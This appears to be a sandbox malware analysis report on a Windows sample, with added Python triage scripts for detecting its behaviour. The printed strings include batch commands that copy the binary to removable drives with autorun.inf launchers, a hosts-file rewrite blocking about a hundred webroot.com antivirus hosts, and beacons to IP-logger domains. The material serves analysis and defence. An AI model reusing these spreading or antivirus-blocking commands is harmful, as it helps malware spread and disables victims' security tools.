Source: bin.exe.3.dr | Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
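
The strings above describe two behaviours worth checking for on any host this sample touched: the batch fragments copy the binary to D:\ and E:\ as bin.exe and write an autorun.inf whose open= key launches it on insertion, and the run of "1.1.1.1 host" pairs next to the hosts path is a hosts-file rewrite that pins roughly a hundred webroot.com names to a single third-party address so the product cannot reach its own infrastructure. The triage helpers below are an added example written for this report, not code from the sample or from Joe Sandbox; the vendor watch-list is a hypothetical starting point, and both sample inputs are constructed to mirror the strings in the report.

```python
"""Triage helpers for the two behaviours in the strings above."""
from collections import Counter

# Hypothetical watch-list (extend with the vendors your estate runs):
# hostnames under these domains should never be pinned in a hosts file.
SECURITY_VENDOR_DOMAINS = ("webroot.com",)
# Mapping to these addresses is ordinary ad or telemetry blocking, not sinkholing.
BENIGN_TARGETS = {"127.0.0.1", "0.0.0.0", "::1"}
# autorun.inf keys that make Windows run something when the drive is inserted.
AUTORUN_LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")


def parse_hosts(text):
    """Return [(ip, hostname), ...] for every mapping; comments are dropped."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        entries.extend((fields[0], name.lower()) for name in fields[1:])
    return entries


def _under(name, domain):
    return name == domain or name.endswith("." + domain)


def hosts_findings(text, min_cluster=10):
    """Flag vendor hostnames pinned to a live address, and any live address
    that has many hostnames collapsed onto it (mass sinkholing)."""
    entries = parse_hosts(text)
    findings = []
    for ip, name in entries:
        if ip not in BENIGN_TARGETS and any(_under(name, d) for d in SECURITY_VENDOR_DOMAINS):
            findings.append(f"vendor hostname {name} redirected to {ip}")
    per_ip = Counter(ip for ip, _ in entries if ip not in BENIGN_TARGETS)
    for ip, count in per_ip.items():
        if count >= min_cluster:
            findings.append(f"{count} hostnames mapped to {ip}")
    return findings


def autorun_launch_targets(text):
    """Return the values of launch keys in the [autorun] section.

    Tolerates the trailing blank cmd.exe writes with
    'echo open=bin.exe >> autorun.inf' (the space before '>>' is kept)."""
    targets, in_autorun = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() in AUTORUN_LAUNCH_KEYS:
                targets.append(value)
    return targets


# Constructed sample: a stock line plus ten of the entries listed in the report.
SAMPLE_HOSTS = "\n".join([
    "# Copyright (c) 1993-2009 Microsoft Corp.",
    "127.0.0.1 localhost",
    "1.1.1.1 mail.webroot.com",
    "1.1.1.1 carbonite.webroot.com",
    "1.1.1.1 e.webroot.com",
    "1.1.1.1 entupdates-cdn.webroot.com",
    "1.1.1.1 lp-carbonite.webroot.com",
    "1.1.1.1 lp.webroot.com",
    "1.1.1.1 technet.webroot.com",
    "1.1.1.1 cms.webroot.com",
    "1.1.1.1 partner.webroot.com",
    "1.1.1.1 lp-carbonite-sandbox.webroot.com",
])
# Constructed autorun.inf as the two echo commands above write it.
SAMPLE_AUTORUN = "[autorun] \r\nopen=bin.exe \r\n"

if __name__ == "__main__":
    for finding in hosts_findings(SAMPLE_HOSTS):
        print(finding)
    print("autorun launches:", autorun_launch_targets(SAMPLE_AUTORUN))
```

Run it against C:\Windows\System32\drivers\etc\hosts and the root of each removable drive on a suspect host. The cluster check matters more than the watch-list: a vendor you did not list still shows up when dozens of names collapse onto one live address, which no legitimate hosts file does.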

Networking

Source: C:\Users\user\Desktop\IPrstVM17M.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: C:\Users\user\Desktop\IPrstVM17M.exe | HTTP traffic: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: Joe Sandbox View | IP Address: 104.26.8.202
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: global traffic | HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Host: stopify.co Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Host: grabify.world Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: grabify.link
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: unknown | DNS traffic detected: queries for: stopify.co
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaV
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com/7
Source: IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://google.com1
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/.
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/B
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-a
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ws.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.$
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/(
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/F
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgH
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.world/
Source: IPrstVM17M.exe, 00000000.00000003.1992051508.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg:
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stopify.co/
Source: IPrstVM17M.exe, bin.exe.3.dr | String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg%
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpgm
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
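
The requests above show one pattern from three angles: a fixed, non-browser User-Agent of MyApp, the same /news.php?tid=JBB69H.jpg path requested from stopify.co, grabify.world and grabify.link in turn (an IP-logger hit with a fallback domain list, the tid value attributing the hit to whoever created the link), and Google answering a bare GET / with its /sorry/ page, which it serves once it has classified the client as automated. The following triage is an added example written for this report, not code from the sample or from Joe Sandbox; the domain set is the one observed above, the request heads are constructed to mirror the capture (the long Google query string and cookie are shortened), and the "Mozilla/" browser heuristic is an assumption.

```python
"""Triage of captured HTTP request heads for the beaconing pattern above."""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# The three hosts that received the same tracking path in the capture.
IP_LOGGER_DOMAINS = {"grabify.link", "grabify.world", "stopify.co"}


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, target, headers)."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def looks_like_browser(user_agent):
    """Assumption: every mainstream browser UA starts with 'Mozilla/'."""
    return user_agent.startswith("Mozilla/")


def tracking_id(target):
    """The tid= value the logger uses to attribute a hit to its creator."""
    return parse_qs(urlsplit(target).query).get("tid", [None])[0]


def triage(raw_requests):
    """Return findings by category for a list of raw request heads."""
    findings = {"ip_logger": [], "non_browser_ua": [], "bot_challenge": [], "shared_path": {}}
    hosts_by_target = defaultdict(set)
    for raw in raw_requests:
        _method, target, headers = parse_request(raw)
        host = headers.get("host", "").lower()
        ua = headers.get("user-agent", "")
        if host in IP_LOGGER_DOMAINS:
            findings["ip_logger"].append(host)
        if not looks_like_browser(ua):
            findings["non_browser_ua"].append((host, ua))
        # Google serves /sorry/ once it has classified the client as automated.
        if host.endswith("google.com") and urlsplit(target).path.startswith("/sorry/"):
            findings["bot_challenge"].append(host)
        hosts_by_target[target].add(host)
    # One tracking path sent to several hosts in turn is a fallback list.
    for target, hosts in hosts_by_target.items():
        if len(hosts) >= 2:
            findings["shared_path"][target] = sorted(hosts)
    return findings


# Constructed request heads mirroring the five captured above (shortened).
SAMPLE_REQUESTS = [
    "GET /news.php?tid=JBB69H.jpg HTTP/1.1\r\nUser-Agent: MyApp\r\nHost: stopify.co\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /news.php?tid=JBB69H.jpg HTTP/1.1\r\nUser-Agent: MyApp\r\nCache-Control: no-cache\r\n"
    "Host: grabify.world\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /news.php?tid=JBB69H.jpg HTTP/1.1\r\nUser-Agent: MyApp\r\nCache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\nHost: grabify.link\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: MyApp\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    "Host: google.com\r\n\r\n",
    "GET /sorry/index?continue=http://google.com/ HTTP/1.1\r\nUser-Agent: MyApp\r\n"
    "Connection: Keep-Alive\r\nHost: www.google.com\r\n\r\n",
]

if __name__ == "__main__":
    result = triage(SAMPLE_REQUESTS)
    for category, hits in result.items():
        print(f"{category}: {hits}")
    print("tracking id:", tracking_id("/news.php?tid=JBB69H.jpg"))
```

The shared-path check is the one that survives a domain change: a new logger alias with the same tid path still clusters, whereas the fixed domain set only catches the three hosts this sample used.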

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\IPrstVM17M.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: String function: 00207BE0 appears 38 times
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: String function: 00207E40 appears 373 times
Source: IPrstVM17M.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal64.adwa.evad.winEXE@16/4@5/5
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Code function: 0_2_00201F90 CreateToolhelp32Snapshot,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,Process32FirstW,CloseHandle,Process32NextW,_invalid_parameter_noinfo_noreturn,CloseHandle,0_2_00201F90
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: IPrstVM17M.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: IPrstVM17M.exe | ReversingLabs: Detection: 15%
Source: IPrstVM17M.exe | Virustotal: Detection: 14%
Source: IPrstVM17M.exe | String found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exeString found in binary or memory: @Unknown exceptionbad array new lengthstring too longbad castFailed to create process snapshot.Failed to retrieve first process.MyApphttps://stopify.co/news.php?tid=JBB69H.jpg Failed to open URL. Error code: Failed to initialize WinINet. Error code: Error: Unable to open file Error: Unable to open file for writing: Text appended to executable successfully./tsoHbrKdetcirtseR))2918=:308.4.1.655311.048.2.1:lortnoCtnuoccAresu()retupmoc=ssalCtcejbo()retupmoc=yrogetaCtcejbo(&(dleiFgnikcaB__k>npU<)+]}0{[(|)$+.*]}0{[(dleiFgnikcaB__k>mlaer<YTIROHTUA_REIFITNEDI_DIS_CPR_ofnInogoLniamoDnigoLdnAlacigoLpOepytyalpsiDecruoseRnoisseSnogoLgnitanigirOdleiFgnikcaB__k>stekcit<YTIRGETNI_OFNI_NEKOT_PASLdleiFgnikcaB__k>muskcehc<etacifitreCrevreSyfireV_teg}} }1{ = eulav ,}0{ = xedni {{dleiFgnikcaB__k>emaNniamoDsnD<dleiFgnikcaB__k>epyTnoitpyrcnE<dleiFgnikcaB__k>yeKcilbuPtcejbuS<dmctnirptratSnoitcellocdetroppusnu sirotareneG.emirP.htaM.onoMsgratnirpffogoltsalecnoNrevres5.2.4.3.101.1.048.61.2dleiFgnikcaB__k>edoc_rorre<DROWSSAP_ERIPXE_TNODEGNAHC_TNAC_DWSSAPrepleHreffuBceSelpitluMyarrAsetyBreffuBcesnoitcelloCrellortnoCniamoDegAdrowssaPmuminiMegAdrowssaPmumixaMepyTsserddArellortnoCniamoDsserddArellortnoCniamoDtsrif snmuloc eht tes 
esaelP1__b>shtgneLnmuloC<reifitnedIyrotceriDpadLkcabllaCetacifitreCrevreSyfireVemittrats_tegemittrats_tes0_etirW1_etirW2_etirW74.1.4.3.101.1.048.61.272.1.4.3.101.1.048.61.27.1.4.3.101.1.048.61.2pmatsemitnogoltsalnogoltsal2__b>yeKetavirProFniPteS<1__b>yeKetavirProFniPteS<0__b>yeKetavirProFniPteS<eldnaHredivorPotpyrCyeKetavirProFniPteSevirDyrotceriDemoHemaNniamoDnogoLtpircSnogoLemiTffogoLtnuoCnogoLreussillac-noitcurtsnidloh-ditcejer-noitcurtsnidloh-dienon-noitcurtsnidloh-di652ahs-htiw-asd-di422ahs-htiw-asd-ditnuoCtniopdnEqestorPcpRREIFITNEDI_XATNYS_CPRECAFRETNI_REVRES_CPRTNIOPDNE_QESTORP_CPRELBAT_HCTAPSID_CPRtniopdnEqestorPcpRtnuoCelbaThctapsiDOFNI_REVRES_LDIM1.3.2.5.1.6.3.1NWONKNU_SUTATS_NOITACOVER_RRE_CDKDERIUQER_RESU_OT_RESU_RRE_PA_BRKETACIFITREC_YFIREV_TNAC_RRE_CDKHCTAMSIM_EMAN_TNEILC_RRE_CDKEUQINU_TON_LAPICNIRP_RRE_CDKTSEUQER_EHCAC_TKT_YREUQ_BREKNWONKNU_LAPICNIRP_C_RRE_CDKTNUOCCA_TSURT_REVRESdleiFgnikcaB__k>stnetnoc<3.2.04001.048.2.12.2.04001.048.2.11.2.04001.048.2.184.1.4.3.101.1.048.61.282.1.4.3.101.1.048.61.28.1.4.3.101.1.048.61.2sepytnoitpyrcnedetroppus-sdsmdetaercnehwytitnedIrehtOfOflaheBnOtcAoTdewollA-SDsmslapicnirPytiruceSngieroF=NCstnuoccA ecivreS deganaM=NCsrellortnoC niamoD=UOlortnoctnuoccaresumetsySCetacoLDC no rorrE}3,1{d\}3{).\}3,1{d\(|}4,1{]f-aF-A9-0[}7{):}4,1{]f-aF-A9-0[(mrof lamiced ro xeh a ni ton si eulav gnirts DIUL dessaP.0 naht retaerg eb tsum 'snmuloc' - )(tilpS ]RORRE[gnirtSeniLelgnis - )(tilpS ]RORRE[}0{ : emaNresU}0{ : niamoD}0{ : epyTnogoL}0{ : dInogoL}0{ : revreSnogoL}0{ : niamoDSNDrevreSnogoL}0{ : egakcaPnoitacitnehtuA}0{ : emaNlapicnirPresU}0{ : DISresU/,,,,,,(Fvo*V&<`?*V'@g?+W&8U/+W(Fv?*V0.0.1v xEresufnoCredoc
Source: unknown | Process created: C:\Users\user\Desktop\IPrstVM17M.exe "C:\Users\user\Desktop\IPrstVM17M.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IPrstVM17M.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
